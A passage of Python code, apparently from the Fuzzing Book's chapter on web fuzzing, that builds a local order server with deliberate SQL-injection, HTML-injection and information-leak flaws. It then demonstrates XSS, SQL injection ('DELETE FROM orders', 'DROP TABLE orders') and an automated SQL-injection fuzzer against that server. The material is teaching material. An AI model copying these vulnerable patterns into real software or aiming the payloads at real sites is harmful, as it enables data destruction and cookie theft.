"lockset": "One FuzzingBook Lock Set"
}
HTML_ORDER_FORM = """
<html><body>
<form action="/order" style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Swag Order Form</strong>
<p>
Yes! Please send me at your earliest convenience
<select name="item">
"""
# (We don't use h2, h3, etc. here
# as they interfere with the notebook table of contents)
for item in FUZZINGBOOK_SWAG:
HTML_ORDER_FORM += \
'<option value="{item}">{name}</option>\n'.format(item=item,
name=FUZZINGBOOK_SWAG[item])
HTML_ORDER_FORM += """
</select>
<br>
<table>
<tr><td>
<label for="name">Name: </label><input type="text" name="name">
</td><td>
<label for="email">Email: </label><input type="email" name="email"><br>
</td></tr>
<tr><td>
<label for="city">City: </label><input type="text" name="city">
</td><td>
<label for="zip">ZIP Code: </label><input type="number" name="zip">
</tr></tr>
</table>
<input type="checkbox" name="terms"><label for="terms">I have read
the <a href="/terms">terms and conditions</a></label>.<br>
<input type="submit" name="submit" value="Place order">
</p>
</form>
</body></html>
"""
if __name__ == '__main__':
from IPython.display import display
from .bookutils import HTML
if __name__ == '__main__':
HTML(HTML_ORDER_FORM)
#### Order Confirmation
if __name__ == '__main__':
print('\n#### Order Confirmation')
HTML_ORDER_RECEIVED = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Thank you for your Fuzzingbook Order!</strong>
<p id="confirmation">
We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>
A confirmation mail will be sent to {email}.
</p>
<p>
Want more swag? Use our <a href="/">order form</a>!
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_ORDER_RECEIVED.format(item_name="One FuzzingBook Rotary Hammer",
name="Jane Doe",
email="doe@example.com",
city="Seattle",
zip="98104"))
#### Terms and Conditions
if __name__ == '__main__':
print('\n#### Terms and Conditions')
HTML_TERMS_AND_CONDITIONS = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Terms and Conditions</strong>
<p>
The content of this project is licensed under the
<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">Creative Commons
Attribution-NonCommercial-ShareAlike 4.0 International License.</a>
</p>
<p>
To place an order, use our <a href="/">order form</a>.
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_TERMS_AND_CONDITIONS)
#### Storing Orders
if __name__ == '__main__':
print('\n#### Storing Orders')
import sqlite3
import os
ORDERS_DB = "orders.db"
def init_db():
if os.path.exists(ORDERS_DB):
os.remove(ORDERS_DB)
db_connection = sqlite3.connect(ORDERS_DB)
db_connection.execute("DROP TABLE IF EXISTS orders")
db_connection.execute("CREATE TABLE orders "
"(item text, name text, email text, "
"city text, zip text)")
db_connection.commit()
return db_connection
if __name__ == '__main__':
db = init_db()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("INSERT INTO orders " +
"VALUES ('lockset', 'Walter White', "
"'white@jpwynne.edu', 'Albuquerque', '87101')")
db.commit()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("DELETE FROM orders WHERE name = 'Walter White'")
db.commit()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
#### Handling HTTP Requests
if __name__ == '__main__':
print('\n#### Handling HTTP Requests')
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
try:
# print("GET " + self.path)
if self.path == "/":
self.send_order_form()
elif self.path.startswith("/order"):
self.handle_order()
elif self.path.startswith("/terms"):
self.send_terms_and_conditions()
else:
self.not_found()
except Exception:
self.internal_server_error()
##### Order Form
if __name__ == '__main__':
print('\n##### Order Form')
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_order_form(self):
self.send_response(HTTPStatus.OK, "Place your order")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(HTML_ORDER_FORM.encode("utf8"))
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_terms_and_conditions(self):
self.send_response(HTTPStatus.OK, "Terms and Conditions")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode("utf8"))
##### Processing Orders
if __name__ == '__main__':
print('\n##### Processing Orders')
import urllib.parse
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def get_field_values(self):
# Note: this fails to decode non-ASCII characters properly
query_string = urllib.parse.urlparse(self.path).query
# fields is { 'item': ['tshirt'], 'name': ['Jane Doe'], ...}
fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)
values = {}
for key in fields:
values[key] = fields[key][0]
return values
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def handle_order(self):
values = self.get_field_values()
self.store_order(values)
self.send_order_received(values)
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def store_order(self, values):
db = sqlite3.connect(ORDERS_DB)
# The following should be one line
sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)
self.log_message("%s", sql_command)
db.executescript(sql_command)
db.commit()
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_order_received(self, values):
# Should use html.escape()
values["item_name"] = FUZZINGBOOK_SWAG[values["item"]]
confirmation = HTML_ORDER_RECEIVED.format(**values).encode("utf8")
self.send_response(HTTPStatus.OK, "Order received")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(confirmation)
##### Other HTTP commands
if __name__ == '__main__':
print('\n##### Other HTTP commands')
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def do_HEAD(self):
# print("HEAD " + self.path)
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", "text/html")
self.end_headers()
#### Error Handling
if __name__ == '__main__':
print('\n#### Error Handling')
##### Page Not Found
if __name__ == '__main__':
print('\n##### Page Not Found')
HTML_NOT_FOUND = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Sorry.</strong>
<p>
This page does not exist. Try our <a href="/">order form</a> instead.
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_NOT_FOUND)
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def not_found(self):
self.send_response(HTTPStatus.NOT_FOUND, "Not found")
self.send_header("Content-type", "text/html")
self.end_headers()
message = HTML_NOT_FOUND
self.wfile.write(message.encode("utf8"))
##### Internal Errors
if __name__ == '__main__':
print('\n##### Internal Errors')
HTML_INTERNAL_SERVER_ERROR = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Internal Server Error</strong>
<p>
The server has encountered an internal error. Go to our <a href="/">order form</a>.
<pre>{error_message}</pre>
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_INTERNAL_SERVER_ERROR)
import sys
import traceback
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def internal_server_error(self):
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error")
self.send_header("Content-type", "text/html")
self.end_headers()
exc = traceback.format_exc()
self.log_message("%s", exc.strip())
message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc)
self.wfile.write(message.encode("utf8"))
#### Logging
if __name__ == '__main__':
print('\n#### Logging')
from multiprocess import Queue # type: ignore
HTTPD_MESSAGE_QUEUE = Queue()
HTTPD_MESSAGE_QUEUE.put("I am another message")
HTTPD_MESSAGE_QUEUE.put("I am one more message")
from .bookutils import rich_output, terminal_escape
def display_httpd_message(message: str) -> None:
if rich_output():
display(
HTML(
'<pre style="background: NavajoWhite;">' +
message +
"</pre>"))
else:
print(terminal_escape(message))
if __name__ == '__main__':
display_httpd_message("I am a httpd server message")
def print_httpd_messages():
while not HTTPD_MESSAGE_QUEUE.empty():
message = HTTPD_MESSAGE_QUEUE.get()
display_httpd_message(message)
import time
if __name__ == '__main__':
time.sleep(1)
print_httpd_messages()
def clear_httpd_messages() -> None:
while not HTTPD_MESSAGE_QUEUE.empty():
HTTPD_MESSAGE_QUEUE.get()
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def log_message(self, format: str, *args) -> None:
message = ("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
HTTPD_MESSAGE_QUEUE.put(message)
import requests
def webbrowser(url: str, mute: bool = False) -> str:
"""Download and return the http/https resource given by the URL"""
try:
r = requests.get(url)
contents = r.text
finally:
if not mute:
print_httpd_messages()
else:
clear_httpd_messages()
return contents
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Running the Server
if __name__ == '__main__':
print('\n### Running the Server')
def run_httpd_forever(handler_class: type) -> NoReturn: # type: ignore
host = "127.0.0.1" # localhost IP
for port in range(8800, 9000):
httpd_address = (host, port)
try:
httpd = HTTPServer(httpd_address, handler_class)
break
except OSError:
continue
httpd_url = "http://" + host + ":" + repr(port)
HTTPD_MESSAGE_QUEUE.put(httpd_url)
httpd.serve_forever()
from multiprocess import Process
def start_httpd(handler_class: type = SimpleHTTPRequestHandler) \
-> Tuple[Process, str]:
clear_httpd_messages()
httpd_process = Process(target=run_httpd_forever, args=(handler_class,))
httpd_process.start()
httpd_url = HTTPD_MESSAGE_QUEUE.get()
return httpd_process, httpd_url
if __name__ == '__main__':
httpd_process, httpd_url = start_httpd()
httpd_url
### Interacting with the Server
if __name__ == '__main__':
print('\n### Interacting with the Server')
#### Direct Browser Access
if __name__ == '__main__':
print('\n#### Direct Browser Access')
def print_url(url: str) -> None:
if rich_output():
display(HTML('<pre><a href="%s">%s</a></pre>' % (url, url)))
else:
print(terminal_escape(url))
if __name__ == '__main__':
print_url(httpd_url)
if __name__ == '__main__':
from IPython.display import IFrame
if __name__ == '__main__':
IFrame(httpd_url, '100%', 230)
if __name__ == '__main__':
print_httpd_messages()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("DELETE FROM orders")
db.commit()
#### Retrieving the Home Page
if __name__ == '__main__':
print('\n#### Retrieving the Home Page')
if __name__ == '__main__':
contents = webbrowser(httpd_url)
if __name__ == '__main__':
HTML(contents)
#### Placing Orders
if __name__ == '__main__':
print('\n#### Placing Orders')
from urllib.parse import urljoin, urlsplit
if __name__ == '__main__':
urljoin(httpd_url, "/order?foo=bar")
if __name__ == '__main__':
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
if __name__ == '__main__':
HTML(contents)
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
#### Error Messages
if __name__ == '__main__':
print('\n#### Error Messages')
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, "/some/other/path")))
## Fuzzing Input Forms
## -------------------
if __name__ == '__main__':
print('\n## Fuzzing Input Forms')
### Fuzzing with Expected Values
if __name__ == '__main__':
print('\n### Fuzzing with Expected Values')
#### Excursion: Implementing cgi_decode()
if __name__ == '__main__':
print('\n#### Excursion: Implementing cgi_decode()')
import string
def cgi_encode(s: str, do_not_encode: str = "") -> str:
ret = ""
for c in s:
if (c in string.ascii_letters or c in string.digits
or c in "$-_.+!*'()," or c in do_not_encode):
ret += c
elif c == ' ':
ret += '+'
else:
ret += "%%%02x" % ord(c)
return ret
if __name__ == '__main__':
s = cgi_encode('Is "DOW30" down .24%?')
s
if __name__ == '__main__':
cgi_encode("<string>@<string>", "<>")
from .Coverage import cgi_decode # minor dependency
if __name__ == '__main__':
cgi_decode(s)
#### End of Excursion
if __name__ == '__main__':
print('\n#### End of Excursion')
from .Grammars import crange, is_valid_grammar, syntax_diagram, Grammar
ORDER_GRAMMAR: Grammar = {
"<start>": ["<order>"],
"<order>": ["/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>"],
"<item>": ["tshirt", "drill", "lockset"],
"<name>": [cgi_encode("Jane Doe"), cgi_encode("John Smith")],
"<email>": [cgi_encode("j.doe@example.com"), cgi_encode("j_smith@example.com")],
"<city>": ["Seattle", cgi_encode("New York")],
"<zip>": ["<digit>" * 5],
"<digit>": crange('0', '9')
}
if __name__ == '__main__':
assert is_valid_grammar(ORDER_GRAMMAR)
if __name__ == '__main__':
syntax_diagram(ORDER_GRAMMAR)
from .GrammarFuzzer import GrammarFuzzer
if __name__ == '__main__':
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
[order_fuzzer.fuzz() for i in range(5)]
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
### Fuzzing with Unexpected Values
if __name__ == '__main__':
print('\n### Fuzzing with Unexpected Values')
if __name__ == '__main__':
seed = order_fuzzer.fuzz()
seed
from .MutationFuzzer import MutationFuzzer # minor deoendency
if __name__ == '__main__':
mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)
[mutate_order_fuzzer.fuzz() for i in range(5)]
if __name__ == '__main__':
while True:
path = mutate_order_fuzzer.fuzz()
url = urljoin(httpd_url, path)
r = requests.get(url)
if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
break
if __name__ == '__main__':
url
if __name__ == '__main__':
clear_httpd_messages()
HTML(webbrowser(url))
if __name__ == '__main__':
failing_path = path
failing_path
from .Fuzzer import Runner
class WebRunner(Runner):
"""Runner for a Web server"""
def __init__(self, base_url: str = None):
self.base_url = base_url
def run(self, url: str) -> Tuple[str, str]:
if self.base_url is not None:
url = urljoin(self.base_url, url)
import requests # for imports
r = requests.get(url)
if r.status_code == HTTPStatus.OK:
return url, Runner.PASS
elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
return url, Runner.FAIL
else:
return url, Runner.UNRESOLVED
if __name__ == '__main__':
web_runner = WebRunner(httpd_url)
web_runner.run(failing_path)
from .Reducer import DeltaDebuggingReducer # minor
if __name__ == '__main__':
minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)
minimized_path
if __name__ == '__main__':
minimized_url = urljoin(httpd_url, minimized_path)
minimized_url
if __name__ == '__main__':
clear_httpd_messages()
HTML(webbrowser(minimized_url))
## Extracting Grammars for Input Forms
## -----------------------------------
if __name__ == '__main__':
print('\n## Extracting Grammars for Input Forms')
### Searching HTML for Input Fields
if __name__ == '__main__':
print('\n### Searching HTML for Input Fields')
if __name__ == '__main__':
html_text = webbrowser(httpd_url)
print(html_text[html_text.find("<form"):html_text.find("</form>") + len("</form>")])
from html.parser import HTMLParser
class FormHTMLParser(HTMLParser):
"""A parser for HTML forms"""
def reset(self) -> None:
super().reset()
# Form action attribute (a URL)
self.action = ""
# Map of field name to type
# (or selection name to [option_1, option_2, ...])
self.fields: Dict[str, List[str]] = {}
# Stack of currently active selection names
self.select: List[str] = []
class FormHTMLParser(FormHTMLParser):
def handle_starttag(self, tag, attrs):
attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
# print(tag, attributes)
if tag == "form":
self.action = attributes.get("action", "")
elif tag == "select" or tag == "datalist":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = []
self.select.append(name)
else:
self.select.append(None)
elif tag == "option" and "multiple" not in attributes:
current_select_name = self.select[-1]
if current_select_name is not None and "value" in attributes:
self.fields[current_select_name].append(attributes["value"])
elif tag == "input" or tag == "option" or tag == "textarea":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = attributes.get("type", "text")
elif tag == "button":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = [""]
class FormHTMLParser(FormHTMLParser):
def handle_endtag(self, tag):
if tag == "select":
self.select.pop()
class HTMLGrammarMiner:
"""Mine a grammar from a HTML form"""
def __init__(self, html_text: str) -> None:
"""Constructor. `html_text` is the HTML string to parse."""
html_parser = FormHTMLParser()
html_parser.feed(html_text)
self.fields = html_parser.fields
self.action = html_parser.action
if __name__ == '__main__':
html_miner = HTMLGrammarMiner(html_text)
html_miner.action
if __name__ == '__main__':
html_miner.fields
### Mining Grammars for Web Pages
if __name__ == '__main__':
print('\n### Mining Grammars for Web Pages')
from .Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar
class HTMLGrammarMiner(HTMLGrammarMiner):
QUERY_GRAMMAR: Grammar = extend_grammar(CGI_GRAMMAR, {
"<start>": ["<action>?<query>"],
"<text>": ["<string>"],
"<number>": ["<digits>"],
"<digits>": ["<digit>", "<digits><digit>"],
"<digit>": crange('0', '9'),
"<checkbox>": ["<_checkbox>"],
"<_checkbox>": ["on", "off"],
"<email>": ["<_email>"],
"<_email>": [cgi_encode("<string>@<string>", "<>")],
# Use a fixed password in case we need to repeat it
"<password>": ["<_password>"],
"<_password>": ["abcABC.123"],
# Stick to printable characters to avoid logging problems
"<percent>": ["%<hexdigit-1><hexdigit>"],
"<hexdigit-1>": srange("34567"),
# Submissions:
"<submit>": [""]
})
class HTMLGrammarMiner(HTMLGrammarMiner):
def mine_grammar(self) -> Grammar:
"""Extract a grammar from the given HTML text"""
grammar: Grammar = extend_grammar(self.QUERY_GRAMMAR)
grammar["<action>"] = [self.action]
query = ""
for field in self.fields:
field_symbol = new_symbol(grammar, "<" + field + ">")
field_type = self.fields[field]
if query != "":
query += "&"
query += field_symbol
if isinstance(field_type, str):
field_type_symbol = "<" + field_type + ">"
grammar[field_symbol] = [field + "=" + field_type_symbol]
if field_type_symbol not in grammar:
# Unknown type
grammar[field_type_symbol] = ["<text>"]
else:
# List of values
value_symbol = new_symbol(grammar, "<" + field + "-value>")
grammar[field_symbol] = [field + "=" + value_symbol]
grammar[value_symbol] = field_type # type: ignore
grammar["<query>"] = [query]
# Remove unused parts
for nonterminal in unreachable_nonterminals(grammar):
del grammar[nonterminal]
assert is_valid_grammar(grammar)
return grammar
if __name__ == '__main__':
html_miner = HTMLGrammarMiner(html_text)
grammar = html_miner.mine_grammar()
grammar
if __name__ == '__main__':
grammar["<start>"]
if __name__ == '__main__':
grammar["<action>"]
if __name__ == '__main__':
grammar["<query>"]
if __name__ == '__main__':
grammar["<zip>"]
if __name__ == '__main__':
grammar["<terms>"]
if __name__ == '__main__':
order_fuzzer = GrammarFuzzer(grammar)
[order_fuzzer.fuzz() for i in range(3)]
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
### A Fuzzer for Web Forms
if __name__ == '__main__':
print('\n### A Fuzzer for Web Forms')
class WebFormFuzzer(GrammarFuzzer):
"""A Fuzzer for Web forms"""
def __init__(self, url: str, *,
grammar_miner_class: Optional[type] = None,
**grammar_fuzzer_options):
"""Constructor.
`url` - the URL of the Web form to fuzz.
`grammar_miner_class` - the class of the grammar miner
to use (default: `HTMLGrammarMiner`)
Other keyword arguments are passed to the `GrammarFuzzer` constructor
"""
if grammar_miner_class is None:
grammar_miner_class = HTMLGrammarMiner
self.grammar_miner_class = grammar_miner_class
# We first extract the HTML form and its grammar...
html_text = self.get_html(url)
grammar = self.get_grammar(html_text)
# ... and then initialize the `GrammarFuzzer` superclass with it
super().__init__(grammar, **grammar_fuzzer_options)
def get_html(self, url: str):
"""Retrieve the HTML text for the given URL `url`.
To be overloaded in subclasses."""
return requests.get(url).text
def get_grammar(self, html_text: str):
"""Obtain the grammar for the given HTML `html_text`.
To be overloaded in subclasses."""
grammar_miner = self.grammar_miner_class(html_text)
return grammar_miner.mine_grammar()
if __name__ == '__main__':
web_form_fuzzer = WebFormFuzzer(httpd_url)
web_form_fuzzer.fuzz()
if __name__ == '__main__':
web_form_runner = WebRunner(httpd_url)
web_form_fuzzer.runs(web_form_runner, 10)
if __name__ == '__main__':
clear_httpd_messages()
## Crawling User Interfaces
## ------------------------
if __name__ == '__main__':
print('\n## Crawling User Interfaces')
class LinkHTMLParser(HTMLParser):
"""Parse all links found in a HTML page"""
def reset(self):
super().reset()
self.links = []
def handle_starttag(self, tag, attrs):
attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
if tag == "a" and "href" in attributes:
# print("Found:", tag, attributes)
self.links.append(attributes["href"])
### Excursion: Implementing a Crawler
if __name__ == '__main__':
print('\n### Excursion: Implementing a Crawler')
from collections import deque
import urllib.robotparser
def crawl(url, max_pages: Union[int, float] = 1, same_host: bool = True):
"""Return the list of linked URLs from the given URL.
`max_pages` - the maximum number of pages accessed.
`same_host` - if True (default), stay on the same host"""
pages = deque([(url, "<param>")])
urls_seen = set()
rp = urllib.robotparser.RobotFileParser()
rp.set_url(urljoin(url, "/robots.txt"))
rp.read()
while len(pages) > 0 and max_pages > 0:
page, referrer = pages.popleft()
if not rp.can_fetch("*", page):
# Disallowed by robots.txt
continue
r = requests.get(page)
max_pages -= 1
if r.status_code != HTTPStatus.OK:
print("Error " + repr(r.status_code) + ": " + page,
"(referenced from " + referrer + ")",
file=sys.stderr)
continue
content_type = r.headers["content-type"]
if not content_type.startswith("text/html"):
continue
parser = LinkHTMLParser()
parser.feed(r.text)
for link in parser.links:
target_url = urljoin(page, link)
if same_host and urlsplit(
target_url).hostname != urlsplit(url).hostname:
# Different host
continue
if urlsplit(target_url).fragment != "":
# Ignore #fragments
continue
if target_url not in urls_seen:
pages.append((target_url, page))
urls_seen.add(target_url)
yield target_url
if page not in urls_seen:
urls_seen.add(page)
yield page
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
if __name__ == '__main__':
for url in crawl(httpd_url):
print_httpd_messages()
print_url(url)
if __name__ == '__main__':
for url in crawl("https://www.fuzzingbook.org/"):
print_url(url)
if __name__ == '__main__':
for url in crawl(httpd_url, max_pages=float('inf')):
web_form_fuzzer = WebFormFuzzer(url)
web_form_runner = WebRunner(url)
print(web_form_fuzzer.run(web_form_runner))
if __name__ == '__main__':
clear_httpd_messages()
## Crafting Web Attacks
## --------------------
if __name__ == '__main__':
print('\n## Crafting Web Attacks')
### HTML Injection Attacks
if __name__ == '__main__':
print('\n### HTML Injection Attacks')
from .Grammars import extend_grammar
ORDER_GRAMMAR_WITH_HTML_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode('''
Jane Doe<p>
<strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong>
</p>
''')],
})
if __name__ == '__main__':
html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)
order_with_injected_html = html_injection_fuzzer.fuzz()
order_with_injected_html
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders WHERE name LIKE '%<%'").fetchall())
### Cross-Site Scripting Attacks
if __name__ == '__main__':
print('\n### Cross-Site Scripting Attacks')
ORDER_GRAMMAR_WITH_XSS_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode('Jane Doe' +
'<script>' +
'document.title = document.cookie.substring(0, 10);' +
'</script>')
],
})
if __name__ == '__main__':
xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION)
order_with_injected_xss = xss_injection_fuzzer.fuzz()
order_with_injected_xss
if __name__ == '__main__':
url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss)
url_with_injected_xss
if __name__ == '__main__':
HTML(webbrowser(url_with_injected_xss, mute=True))
if __name__ == '__main__':
HTML('<script>document.title = "Jupyter"</script>')
### SQL Injection Attacks
if __name__ == '__main__':
print('\n### SQL Injection Attacks')
if __name__ == '__main__':
values: Dict[str, str] = {
"item": "tshirt",
"name": "Jane Doe",
"email": "j.doe@example.com",
"city": "Seattle",
"zip": "98104"
}
if __name__ == '__main__':
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
sql_command
if __name__ == '__main__':
values["name"] = "Jane', 'x', 'x', 'x'); DELETE FROM orders; -- "
if __name__ == '__main__':
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
sql_command
from .Grammars import extend_grammar
ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode("Jane', 'x', 'x', 'x'); DELETE FROM orders; --")],
})
if __name__ == '__main__':
sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)
order_with_injected_sql = sql_injection_fuzzer.fuzz()
order_with_injected_sql
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
### Leaking Internal Information
if __name__ == '__main__':
print('\n### Leaking Internal Information')
if __name__ == '__main__':
answer = webbrowser(urljoin(httpd_url, "/order"), mute=True)
if __name__ == '__main__':
HTML(answer)
## Fully Automatic Web Attacks
## ---------------------------
if __name__ == '__main__':
print('\n## Fully Automatic Web Attacks')
class SQLInjectionGrammarMiner(HTMLGrammarMiner):
"""Demonstration of an automatic SQL Injection attack grammar miner"""
# Some common attack schemes
ATTACKS: List[str] = [
"<string>' <sql-values>); <sql-payload>; <sql-comment>",
"<string>' <sql-comment>",
"' OR 1=1<sql-comment>'",
"<number> OR 1=1",
]
def __init__(self, html_text: str, sql_payload: str):
"""Constructor.
`html_text` - the HTML form to be attacked
`sql_payload` - the SQL command to be executed
"""
super().__init__(html_text)
self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {
"<text>": ["<string>", "<sql-injection-attack>"],
"<number>": ["<digits>", "<sql-injection-attack>"],
"<checkbox>": ["<_checkbox>", "<sql-injection-attack>"],
"<email>": ["<_email>", "<sql-injection-attack>"],
"<sql-injection-attack>": [
cgi_encode(attack, "<->") for attack in self.ATTACKS
],
"<sql-values>": ["", cgi_encode("<sql-values>, '<string>'", "<->")],
"<sql-payload>": [cgi_encode(sql_payload)],
"<sql-comment>": ["--", "#"],
})
if __name__ == '__main__':
html_miner = SQLInjectionGrammarMiner(
html_text, sql_payload="DROP TABLE orders")
if __name__ == '__main__':
grammar = html_miner.mine_grammar()
grammar
if __name__ == '__main__':
grammar["<text>"]
if __name__ == '__main__':
sql_fuzzer = GrammarFuzzer(grammar)
sql_fuzzer.fuzz()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
def orders_db_is_empty():
"""Return True if the orders database is empty (= we have been successful)"""
try:
entries = db.execute("SELECT * FROM orders").fetchall()
except sqlite3.OperationalError:
return True
return len(entries) == 0
if __name__ == '__main__':
orders_db_is_empty()
class SQLInjectionFuzzer(WebFormFuzzer):
"""Simple demonstrator of a SQL Injection Fuzzer"""
def __init__(self, url: str, sql_payload : str ="", *,
sql_injection_grammar_miner_class: Optional[type] = None,
**kwargs):
"""Constructor.
`url` - the Web page (with a form) to retrieve
`sql_payload` - the SQL command to execute
`sql_injection_grammar_miner_class` - the miner to be used
(default: SQLInjectionGrammarMiner)
Other keyword arguments are passed to `WebFormFuzzer`.
"""
self.sql_payload = sql_payload
if sql_injection_grammar_miner_class is None:
sql_injection_grammar_miner_class = SQLInjectionGrammarMiner
self.sql_injection_grammar_miner_class = sql_injection_grammar_miner_class
super().__init__(url, **kwargs)
def get_grammar(self, html_text):
"""Obtain a grammar with SQL injection commands"""
grammar_miner = self.sql_injection_grammar_miner_class(
html_text, sql_payload=self.sql_payload)
return grammar_miner.mine_grammar()
if __name__ == '__main__':
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
web_runner = WebRunner(httpd_url)
trials = 1
while True:
sql_fuzzer.run(web_runner)
if orders_db_is_empty():
break
trials += 1
if __name__ == '__main__':
trials
if __name__ == '__main__':
orders_db_is_empty()
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
### Fuzzing Web Forms
if __name__ == '__main__':
print('\n### Fuzzing Web Forms')
if __name__ == '__main__':
web_form_fuzzer = WebFormFuzzer(httpd_url)
if __name__ == '__main__':
web_form_fuzzer.grammar['<start>']
if __name__ == '__main__':
web_form_fuzzer.grammar['<action>']
if __name__ == '__main__':
web_form_fuzzer.grammar['<query>']
if __name__ == '__main__':
web_form_fuzzer.fuzz()
### SQL Injection Attacks
if __name__ == '__main__':
print('\n### SQL Injection Attacks')
if __name__ == '__main__':
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
sql_fuzzer.fuzz()
from .ClassDiagram import display_class_hierarchy
from .Fuzzer import Fuzzer, Runner
from .Grammars import Grammar, Expansion
from .GrammarFuzzer import GrammarFuzzer, DerivationTree
if __name__ == '__main__':
display_class_hierarchy([WebFormFuzzer, SQLInjectionFuzzer, WebRunner,
HTMLGrammarMiner, SQLInjectionGrammarMiner],
public_methods=[
Fuzzer.__init__,
Fuzzer.fuzz,
Fuzzer.run,
Fuzzer.runs,
Runner.__init__,
Runner.run,
WebRunner.__init__,
WebRunner.run,
GrammarFuzzer.__init__,
GrammarFuzzer.fuzz,
GrammarFuzzer.fuzz_tree,
WebFormFuzzer.__init__,
SQLInjectionFuzzer.__init__,
HTMLGrammarMiner.__init__,
SQLInjectionGrammarMiner.__init__,
],
types={
'DerivationTree': DerivationTree,
'Expansion': Expansion,
'Grammar': Grammar
},
project='fuzzingbook')
## Lessons Learned
## ---------------
if __name__ == '__main__':
print('\n## Lessons Learned')
if __name__ == '__main__':
clear_httpd_messages()
if __name__ == '__main__':
httpd_process.terminate()
## Next Steps
## ----------
